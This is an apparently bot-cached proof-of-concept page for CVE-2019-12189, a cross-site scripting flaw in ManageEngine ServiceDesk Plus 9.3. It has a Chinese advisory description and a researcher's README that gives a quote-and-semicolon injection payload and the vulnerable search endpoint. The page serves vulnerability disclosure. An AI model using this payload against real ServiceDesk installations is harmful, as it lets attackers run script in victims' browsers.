CVE-2019-12189 PoC — ZOHO ManageEngine ServiceDesk Plus 跨站脚本漏洞

Source

https://github.com/falconz/CVE-2019-12189

Associated Vulnerability

Title:ZOHO ManageEngine ServiceDesk Plus 跨站脚本漏洞 (CVE-2019-12189)
Description:ZOHO ManageEngine ServiceDesk Plus是美国卓豪（ZOHO）公司的一套基于ITIL架构的IT服务管理软件（ITSM）。该软件集成了事件管理、问题管理、资产管理、IT项目管理、采购与合同管理等功能模块。 ZOHO ManageEngine ServiceDesk Plus 9.3版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。

Readme

# CVE-2019-12189 - Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability 

Information
Description:XSS was discovered in ManageEngine ServiceDesk Plus version
Versions Affected: 9.3
Researcher: Dang The Tuyen

# Proof-of-concept
The vulnerability stems from the confusion of both single quotes and semicolon in the query string of the URL.

payload: ';alert('XSS');'
Attack vector: http://<domain>/SearchN.do

# Screenshot

![Alt text](https://github.com/falconz/CVE-2019-12189/blob/master/1.jpg?raw=true "Optional title")
![Alt text](https://github.com/falconz/CVE-2019-12189/blob/master/2.jpg?raw=true "Optional title")

File Snapshot


 [4.0K]  /data/pocs/e97ff27d3a5c5e259e4d1883964a62277b4dd1ed
├── [139K]  1.jpg
├── [ 60K]  2.jpg
└── [ 626]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!